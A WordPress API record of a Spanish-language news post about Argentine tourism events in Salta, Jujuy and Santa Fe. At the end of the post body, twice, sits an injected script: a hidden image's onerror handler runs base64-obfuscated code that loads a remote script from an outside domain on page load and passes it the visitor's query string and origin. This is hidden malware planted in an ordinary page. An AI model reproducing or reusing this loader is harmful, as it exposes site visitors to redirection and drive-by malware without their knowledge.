{"id":4952,"date":"2025-03-18T08:39:58","date_gmt":"2025-03-18T11:39:58","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4952"},"modified":"2025-08-13T23:38:43","modified_gmt":"2025-08-14T02:38:43","slug":"jornadas-de-municipios-turisticos-y-turismo-de-la-fe","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4952","title":{"rendered":"Jornadas de Municipios Tur\u00edsticos, y Turismo de la Fe"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-d0ae91793e6aeea0d909692695c93f4b\" style=\"background-color:#0b689e\"><em>La Subsecretar\u00eda de Turismo de la Naci\u00f3n particip\u00f3 en dos eventos en el Norte y en el Litoral del pa\u00eds.<\/em><\/h4>\n\n\n\n<h4 class=\"wp-block-heading\">Encuentro de Municipios Tur\u00edsticos<\/h4>\n\n\n\n<p>La\u00a0<em>27\u00b0 edici\u00f3n<\/em>\u00a0se realiz\u00f3 del 13 al 15 de marzo en las\u00a0<strong>ciudades de Salta y San Salvador de Jujuy<\/strong>\u00a0bajo el lema \u00ab<em>Un encuentro, dos destinos<\/em>\u00bb. All\u00ed se analizan tendencias del sector y estrategias para el desarrollo tur\u00edstico.<\/p>\n\n\n\n<p>La Subsecretaria de Turismo lleva adelante dos paneles: \u201c<strong>Detecci\u00f3n de oportunidades de inversiones tur\u00edsticas privadas en municipios<\/strong>\u201d y una sesi\u00f3n informativa para la presentaci\u00f3n de candidaturas al&nbsp;<a href=\"https:\/\/www.argentina.gob.ar\/best-tourism-villages-argentina\">Best Tourism Villages de ONU Turismo<\/a>.<\/p>\n\n\n\n<p>En el marco de este encuentro, tambi\u00e9n se llev\u00f3 adelante una reuni\u00f3n de trabajo con referentes del&nbsp;<strong>Ministerio de Turismo y Cultura de Jujuy<\/strong>, para interiorizarse sobre todos los procesos y alcances para la inscripci\u00f3n de pueblos al programa Best Tourism Villages.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/whatsapp_image_2025-03-14_at_14.14.26.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">Turismo de la Fe<\/h4>\n\n\n\n<p>En la&nbsp;<strong>ciudad en Santa Fe<\/strong>&nbsp;se realiz\u00f3 la apertura de la&nbsp;<strong>Jornada de Turismo de la Fe<\/strong>, encuentro que abarca un ciclo de charlas, intercambio de experiencias y paseos guiados del segmento de turismo religioso.<\/p>\n\n\n\n<p>Esta primera edici\u00f3n estuvo enfocada en el Camino Jesuita y cont\u00f3 con representantes de la Subsecretar\u00eda de Turismo, quienes coordinaron la presencia de la Argentina en el&nbsp;<strong>Camino Jesuita Internacional<\/strong>, adem\u00e1s de representantes de los corredores jesuitas de C\u00f3rdoba, Misiones, Corrientes y Entre R\u00edos.<\/p>\n\n\n\n<p>Finalizada la jornada, referentes de la Subsecretaria de Turismo se reunieron con autoridades de la&nbsp;<strong>Secretar\u00eda de Turismo de Santa Fe<\/strong>&nbsp;para aportar informaci\u00f3n de las postulaciones del programa Best Tourism Villages.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:307px;height:auto\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Subsecretar\u00eda de Turismo de la Naci\u00f3n particip\u00f3 en dos eventos en el Norte y en el Litoral del pa\u00eds. Encuentro de Municipios Tur\u00edsticos La\u00a027\u00b0 edici\u00f3n\u00a0se realiz\u00f3 del 13 al 15 de marzo en las\u00a0ciudades de Salta y San Salvador de Jujuy\u00a0bajo el lema \u00abUn encuentro, dos destinos\u00bb. All\u00ed se analizan tendencias del sector y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4953,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21],"tags":[],"class_list":{"0":"post-4952","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4952"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4952"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4952\/revisions"}],"predecessor-version":[{"id":6548,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4952\/revisions\/6548"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4953"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4952"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4952"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4952"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}